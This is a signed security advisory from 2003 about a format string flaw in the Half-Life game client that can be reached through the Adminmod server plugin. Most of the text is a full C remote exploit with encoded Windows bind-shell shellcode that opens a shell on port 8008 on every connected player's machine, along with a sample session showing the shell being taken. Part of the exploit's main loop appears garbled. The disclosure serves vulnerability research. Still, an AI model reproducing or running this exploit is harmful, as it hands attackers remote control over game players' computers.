-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [void.at Security Advisory VSA0304] Half-Life is the underlying game for the most popular online game today, "Counter-Strike", and others. Adminmod is a popular plugin to the half-life-server. Overview ======== Due to a format string in the Half-Life *client*, it is possible for an attacker who has rcon access to a game- server that runs Adminmod, to exploit the machine of a player that is connected to the game server. No, even better, you can exploit ALL clients that play on the server AT ONCE! Note, the attacker needs to know the rcon-password. However, it is easy to sniff since it is being transmitted in plaintext. Affected Versions ================= Since there is always the latest version of Half-Life and Counter-Strike required to play online, there is no need to check for other affected versions; the current one is vulnerable. On the server-side, this bug can be exploited using any Adminmod version. Impact ====== High. Details ======= This seems to be a format string bug in the Half-Life-Client, Adminmod has little to do with it. I found it by accident as I blackboxed the admin_ssay and admin_psay commands. The admin_ssay command sends a textmessage to all players. After some calls the message eventually reaches the function ClientPrint, which is called for every user object (i.e. every player on the server) (util.cpp): 949 /* Rope's stuff */ 950 void ClientPrint( entvars_t *client, int msg_dest, const char *msg_name, 951 const char *param1, const char *param2, const char *param3, 952 const char *param4 ) { 953 954 if ( ClientCheck(client) == 0 ) return; 955 956 if ( (g_msgTextMsg = GET_USER_MSG_ID(PLID, "TextMsg", 0)) == 0 ) { 957 g_msgTextMsg = REG_USER_MSG( "TextMsg", -1 ); 958 } // if 959 960 961 MESSAGE_BEGIN( MSG_ONE, g_msgTextMsg, NULL, client ); 962 WRITE_BYTE( msg_dest ); 963 WRITE_STRING( msg_name ); 964 965 if ( param1 ) 966 WRITE_STRING( param1 ); 967 968 if ( param2 ) 969 WRITE_STRING( param2 ); 970 971 if ( param3 ) 972 WRITE_STRING( param3 ); 973 974 if ( param4 ) 975 WRITE_STRING( param4 ); 976 977 MESSAGE_END(); 978 979 } Since I am no HLSDK developer, I have no idea what that MESSAGE_BEGIN macros do, but I suspect that the Halflife-Client simply prints out the message that was sent by the server using a format function, without checking for evil characters. It seems that only some kind of custom messages trigger this problem. However, you can force the client to execute arbitrary commands that eventually spawn a remote shell. Solution ======== Disable adminmod until a patched version becomes available. Change the rcon-password. Exploit ======= Please find attached a demonstration exploit. Note that it will only work against Windows 2000/XP-Clients due to the architecture of the shellcode (the server-OS is irrelevant). Other versions can of course be exploited using different shellcodes. When you execute the exploit against a victim, it will look for him as if the game crashed (it freezes). On the attacker side, if you don't want to exploit all clients in one shot, you have to modify a command script of adminmod, namely the "admin_psay" command so it doesn't send the "(Private Msg from Admin): "-string to the client (would be a bad thing because the IP jumps directly into that buffer). This is left as an exercise to the reader. Sample exploitation session =========================== greuff@saturn:~$ ./hoagie_adminmod_client localhost 27015 myprecious greuff Writing shellcode fragment at offset 5056... Writing shellcode fragment at offset 4998... Writing shellcode fragment at offset 4940... Writing shellcode fragment at offset 4882... Writing shellcode fragment at offset 4824... Writing shellcode fragment at offset 4766... Writing shellcode fragment at offset 4708... Writing shellcode fragment at offset 4650... Writing shellcode fragment at offset 4592... Writing shellcode fragment at offset 4534... Writing shellcode fragment at offset 4476... Writing shellcode fragment at offset 4418... Writing shellcode fragment at offset 4360... Writing shellcode fragment at offset 4302... Writing shellcode fragment at offset 4244... Writing shellcode fragment at offset 4186... Writing shellcode fragment at offset 4128... Writing shellcode fragment at offset 4070... Writing shellcode fragment at offset 4012... Writing shellcode fragment at offset 3954... Writing shellcode fragment at offset 3896... Writing shellcode fragment at offset 3838... Writing bootstrap at offset 3724... Writing return into shellcode instructions... Shell (hopefully) spawned at client host port 8008. greuff@saturn:~$ telnet 192.168.0.2 8008 Trying 192.168.0.2... Connected to 192.168.0.2. Escape character is '^]'. Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. E:\SIERRA\COUNTE~1>exit Discovered by ============= greuff Credits ======= void.at everyone who was at 19c3 ==================================================== /***************************************************************** * hoagie_adminmod_client.c * * Remote exploit for Halflife-Clients playing on a server running * the Adminmod plugin. * * Spawns a shell at 8008/tcp. * * Author: greuff@void.at * * Credits: * void.at * Taeho Oh for using parts of his shellcode-connection code. * deepzone.org for their shellcode-generator * * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-CONCEPT. * THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE OR * CRIMINAL ACTIVITIES DONE USING THIS PROGRAM. * *****************************************************************/ #include #include #include #include #include #include #include #include #include char server_ip[20]; char rcon_pwd[30]; int server_port; char player_nick[30]; #define STRADDR 0x19d4588 /* - -- portable NT/2k/XP ShellCode features ... www.deepzone.org LoadLibraryA IT address 004AC2E0h GetProcAddress IT address 004AC164h XOR byte 9Fh Remote port 8008 Style C ATTENTION code modified by greuff: 0xff in the first line changed to 0xfe because the HL-client filters out this character. Wrote a short bootstrap loader that changes this byte again to 0xff. (dec %esp, dec %esp, dec %esp, dec %esp, pop %esi, incb 0xf(%esi)) It additionally corrects the single '%' in the code that is filtered out by the format-string-function. (offset 0x65) Works only when the code gets executed by a ret! (buffer- address has to lie on the stack) */ // total length: 1226 bytes char *shellcode[] = { "\x90\x90\x90\x4c\x4c\x4c\x4c\x5e\xfe\x46\x15\xfe\x46\x6b" "\x68\x5e\x56\xc3\x90\x54\x59\xfe\xd1\x58\x33\xc9\xb1\x1c" "\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04" "\x90\x90\x90\xac\x34\x9f\xaa\xe2\xfa\x77\x9f\x9f\x9f\x9f", "\xc2\x1e\x72\x46\xbe\xdf\x9f\x12\x2a\x6d\xbb\xdf\x9f\x12" "\x22\x65\xbb\xdf\x9f\xf5\x98\x0f\x0f\x0f\x0f\xc6\x77\x4d" "\x9d\x9f\x9f\x12\x2a\xb5\xba\xdf\x9f\x12\x22\xac\xba\xdf" "\x9f\xf5\x95\x0f\x0f\x0f\x0f\xc6\x77\x24\x9d\x9f\x9f\xf5", "\x9f\x12\x2a\x46\xba\xdf\x9f\xc9\x12\x2a\x7a\xba\xdf\x9f" "\xc9\x12\x2a\x76\xba\xdf\x9f\xc9\x60\x0a\xac\xba\xdf\x9f" "\xf5\x9f\x12\x2a\x46\xba\xdf\x9f\xc9\x12\x2a\x72\xba\xdf" "\x9f\xc9\x12\x2a\x6e\xba\xdf\x9f\xc9\x60\x0a\xac\xba\xdf", "\x9f\x58\x1a\x6a\xba\xdf\x9f\xdb\x9f\x9f\x9f\x12\x2a\x6a" "\xba\xdf\x9f\xc9\x60\x0a\xa8\xba\xdf\x9f\x12\x2a\xb2\xb9" "\xdf\x9f\x32\xcf\x60\x0a\xcc\xba\xdf\x9f\x12\x2a\xae\xb9" "\xdf\x9f\x32\xcf\x60\x0a\xcc\xba\xdf\x9f\x12\x2a\x6e\xba", "\xdf\x9f\x12\x22\xb2\xb9\xdf\x9f\x3a\x12\x2a\x7a\xba\xdf" "\x9f\x32\x12\x22\xae\xb9\xdf\x9f\x34\x12\x22\xaa\xb9\xdf" "\x9f\x34\x58\x1a\xba\xb9\xdf\x9f\x9f\x9f\x9f\x9f\x58\x1a" "\xbe\xb9\xdf\x9f\x9e\x9e\x9f\x9f\x12\x2a\xa6\xb9\xdf\x9f", "\xc9\x12\x2a\x6a\xba\xdf\x9f\xc9\xf5\x9f\xf5\x9f\xf5\x8f" "\xf5\x9e\xf5\x9f\xf5\x9f\x12\x2a\xd6\xb9\xdf\x9f\xc9\xf5" "\x9f\x60\x0a\xa4\xba\xdf\x9f\xf7\x9f\xbf\x9f\x9f\x0f\xf7" "\x9f\x9d\x9f\x9f\x60\x0a\xdc\xba\xdf\x9f\x16\x1a\xce\xb9", "\xdf\x9f\xac\x5f\xcf\xdf\xcf\xdf\xcf\x60\x0a\x65\xbb\xdf" "\x9f\xcf\xc4\xf5\x8f\x12\x2a\x56\xba\xdf\x9f\xc9\xcc\x60" "\x0a\x61\xbb\xdf\x9f\xf5\x9c\xcc\x60\x0a\x9d\xba\xdf\x9f" "\x12\x2a\xca\xb9\xdf\x9f\xc9\x12\x2a\x56\xba\xdf\x9f\xc9", "\xcc\x60\x0a\x99\xba\xdf\x9f\x12\x22\xc6\xb9\xdf\x9f\x34" "\xac\x5f\xcf\x12\x22\xfa\xb9\xdf\x9f\xc8\xcf\xcf\xcf\x12" "\x2a\x76\xba\xdf\x9f\x32\xcf\x60\x0a\xa0\xba\xdf\x9f\xf5" "\xaf\x60\x0a\xd0\xba\xdf\x9f\x74\xd2\x0f\x0f\x0f\xac\x5f", "\xcf\x12\x22\xfa\xb9\xdf\x9f\xc8\xcf\xcf\xcf\x12\x2a\x76" "\xba\xdf\x9f\x32\xcf\x60\x0a\xa0\xba\xdf\x9f\xf5\xcf\x60" "\x0a\xd0\xba\xdf\x9f\x1c\x22\xfa\xb9\xdf\x9f\x9d\x90\x1d" "\x88\x9e\x9f\x9f\x1e\x22\xfa\xb9\xdf\x9f\x9e\xbf\x9f\x9f", "\xed\x91\x0f\x0f\x0f\x0f\x58\x1a\xfa\xb9\xdf\x9f\x9f\xbf" "\x9f\x9f\xf5\x9f\x14\x1a\xfa\xb9\xdf\x9f\x12\x22\xfa\xb9" "\xdf\x9f\xc8\xcf\x14\x1a\xce\xb9\xdf\x9f\xcf\x12\x2a\x76" "\xba\xdf\x9f\x32\xcf\x60\x0a\xd8\xba\xdf\x9f\xf5\xcf\x60", "\x0a\xd0\xba\xdf\x9f\x14\x1a\xfa\xb9\xdf\x9f\xf5\x9f\xcf" "\x12\x2a\xce\xb9\xdf\x9f\x32\xcf\x12\x2a\xc6\xb9\xdf\x9f" "\x32\xcf\x60\x0a\x95\xba\xdf\x9f\xf5\x9f\x12\x22\xfa\xb9" "\xdf\x9f\xc8\xf5\x9f\xf5\x9f\xf5\x9f\x12\x2a\x76\xba\xdf", "\x9f\x32\xcf\x60\x0a\xa0\xba\xdf\x9f\xf5\xcf\x60\x0a\xd0" "\xba\xdf\x9f\xac\x56\xa6\x12\xfa\xb9\xdf\x9f\x90\x18\xf8" "\x60\x60\x60\xf5\x9f\xf7\x9f\xbf\x9f\x9f\x0f\x12\x2a\xce" "\xb9\xdf\x9f\x32\xcf\x12\x2a\xc6\xb9\xdf\x9f\x32\xcf\x60", "\x0a\x91\xba\xdf\x9f\x16\x1a\xfe\xb9\xdf\x9f\xf5\x9f\x12" "\x22\xfa\xb9\xdf\x9f\xc8\xcf\x12\x2a\xce\xb9\xdf\x9f\x32" "\xcf\x12\x2a\x72\xba\xdf\x9f\x32\xcf\x60\x0a\xd4\xba\xdf" "\x9f\xf5\xcf\x60\x0a\xd0\xba\xdf\x9f\xf5\x9f\x14\x1a\xfe", "\xb9\xdf\x9f\x12\x22\xfa\xb9\xdf\x9f\xc8\xcf\x14\x1a\xce" "\xb9\xdf\x9f\xcf\x12\x2a\x76\xba\xdf\x9f\x32\xcf\x60\x0a" "\xd8\xba\xdf\x9f\xf5\xcf\x60\x0a\xd0\xba\xdf\x9f\x76\x26" "\x61\x60\x60\x12\x2a\xc6\xb9\xdf\x9f\x32\xcf\x60\x0a\x8d", "\xba\xdf\x9f\x12\x2a\xc2\xb9\xdf\x9f\x32\xcf\x60\x0a\x8d" "\xba\xdf\x9f\xf5\x9f\x60\x0a\xc8\xba\xdf\x9f\xce\xc9\xf7" "\x7f\x5d\xd5\x9f\x0f\xc5\x60\x8d\xcf\xc4\xc6\xc8\xc1\xce" "\xc9\xcc\xf7\xfb\x5e\xd5\x9f\x0f\xc5\x60\x8d\xcf\x33\x1b", "\x5f\xea\x64\xc7\x34\xc6\x7d\x76\x5c\xc8\xcc\xd0\xdc\xd4" "\xac\xad\x9f\xec\xf0\xfc\xf4\xfa\xeb\x9f\xfd\xf6\xf1\xfb" "\x9f\xf3\xf6\xec\xeb\xfa\xf1\x9f\xfe\xfc\xfc\xfa\xef\xeb" "\x9f\xec\xfa\xf1\xfb\x9f\xed\xfa\xfc\xe9\x9f\xfc\xf3\xf0", "\xec\xfa\xec\xf0\xfc\xf4\xfa\xeb\x9f\xd4\xda\xcd\xd1\xda" "\xd3\xac\xad\x9f\xdc\xed\xfa\xfe\xeb\xfa\xcf\xf6\xef\xfa" "\x9f\xd8\xfa\xeb\xcc\xeb\xfe\xed\xeb\xea\xef\xd6\xf1\xf9" "\xf0\xde\x9f\xdc\xed\xfa\xfe\xeb\xfa\xcf\xed\xf0\xfc\xfa", "\xec\xec\xde\x9f\xcf\xfa\xfa\xf4\xd1\xfe\xf2\xfa\xfb\xcf" "\xf6\xef\xfa\x9f\xd8\xf3\xf0\xfd\xfe\xf3\xde\xf3\xf3\xf0" "\xfc\x9f\xcd\xfa\xfe\xfb\xd9\xf6\xf3\xfa\x9f\xc8\xed\xf6" "\xeb\xfa\xd9\xf6\xf3\xfa\x9f\xcc\xf3\xfa\xfa\xef\x9f\xdc", "\xf3\xf0\xec\xfa\xd7\xfe\xf1\xfb\xf3\xfa\x9f\xda\xe7\xf6" "\xeb\xcf\xed\xf0\xfc\xfa\xec\xec\x9f\xdc\xf0\xfb\xfa\xfb" "\xbf\xfd\xe6\xbf\xe3\xc5\xfe\xf1\xbf\xa3\xf6\xe5\xfe\xf1" "\xdf\xfb\xfa\xfa\xef\xe5\xf0\xf1\xfa\xb1\xf0\xed\xf8\xa1", "\x9d\x9f\x80\xd7\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f" "\x9f\x9f\x93\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9e\x9f\x9f\x9f" "\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f" "\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f", "\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f" "\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f" "\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f" "\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f", "\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f" "\x9f\x9f\xdc\xd2\xdb\xb1\xda\xc7\xda\x9f\x9f\x9f\x9f\x9f" "\x8f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f\x9f" "\x9f\x9f\x9f\x9f\x9f\x9f\x96\x96\x96\x96\x96\x90\x90\x90"}; // = 22 blocks char loader[]= "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x4c\x4c\x4c\x4c\x5a\x31\xc9\xb1\x27\x42\xe2" "\xfd\x52\x31\xc0\x31\xc9\x66\xbb\x38\x16\x88\xf9\x51\x88" "\xd9\x40\x8a\x3c\x42\x88\x3a\x42\xe2\xf8\x59\xe2\xf1\xc3"; void create_conn(int *sock, char *host, int port) { struct sockaddr_in sin; sin.sin_family=AF_INET; sin.sin_port=htons(port); if(inet_aton(host,&(sin.sin_addr.s_addr))<0) perror("inet_aton"), exit(1); if((*sock=socket(PF_INET,SOCK_DGRAM,0))<0) perror("socket"), exit(1); } void lowlevel_rcon(int sock, char *host, int port, char *cmd, char *reply) { char msg[100000]; struct sockaddr_in sin; struct sockaddr_in sfrom; fd_set fdset; int dummy; sin.sin_family=AF_INET; sin.sin_port=htons(port); if(inet_aton(host,&(sin.sin_addr.s_addr))<0) perror("inet_aton"), exit(1); sprintf(msg,"%c%c%c%c%s",0xff,0xff,0xff,0xff,cmd); if(sendto(sock,msg,strlen(msg),0,(struct sockaddr *)&sin,sizeof(sin))<0) perror("sendto"), exit(1); if(reply) { if(recvfrom(sock,msg,2000,0,(struct sockaddr *)&sfrom,&dummy)<0) perror("recvfrom"), exit(1); if(strncmp(msg,"\xFF\xFF\xFF\xFF",4)) fprintf(stderr,"protocol error: reply\n"), exit(1); strcpy(reply,msg+4); } } void send_rcon(int sock, char *host, int port, char *rconpwd, char *cmd, char *reply_fun) { char reply[1000]; char msg[100000]; lowlevel_rcon(sock,host,port,"challenge rcon",reply); if(!strstr(reply,"challenge rcon ")) fprintf(stderr,"protocol error\n"), exit(1); reply[strlen(reply)-1]=0; sprintf(msg,"rcon %s \"%s\" %s",reply+strlen("challenge rcon "),rconpwd,cmd); if(reply_fun) lowlevel_rcon(sock,host,port,msg,reply); else lowlevel_rcon(sock,host,port,msg,NULL); if(reply_fun) strcpy(reply_fun,reply); } int main(int argc, char **argv) { int sock, i,j; int anzsc; char reply[1000], command[100]; char evil_message[100000]; unsigned int offset, spaces; unsigned long addr; printf("hoagie_adminmod_client - remote exploit for half-life-clients\n"); printf("by greuff@void.at\n\n"); if(argc<4 || argc>5) { printf("Usage: %s server_ip server_port rcon_password [player_nick]\n\n",argv[0]); exit(1); } strcpy(server_ip,argv[1]); server_port=strtol(argv[2],NULL,10); strcpy(rcon_pwd,argv[3]); if(argc==5) { strcpy(player_nick,argv[4]); sprintf(command,"admin_command admin_psay \"%s\"",player_nick); } else { player_nick[0]=0; sprintf(command,"admin_command admin_ssay"); } if(player_nick[0]==0) { printf("Sending to ALL clients! You have 3 sec to abort...\n"); sleep(3); } create_conn(&sock,server_ip,server_port); /********* Step 1 - send the complete shellcode and the loader to the big buffer ***********/ offset=5000+112/2; spaces=0; for(i=21;i>=0;i--) { sprintf(evil_message,"%s ",command); for(j=0;j>8)&0xFF,(addr>>16)&0xFF,(addr>>24)&0xFF,0xc3,734 /* 0x3cd-13 */); printf("Writing return into shellcode instructions...\n"); send_rcon(sock,server_ip,server_port,rcon_pwd,evil_message,reply); close(sock); printf("Shell (hopefully) spawned at client host port 8008.\n"); return 0; } -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iEYEARECAAYFAj4uaREACgkQzxi8qAgTjUMKJwCfTkG/yBIaacxs1MHptPt4esxy aLkAnip0kkfOpoBcfRUPanqWlD12f4m/ =dt77 -----END PGP SIGNATURE-----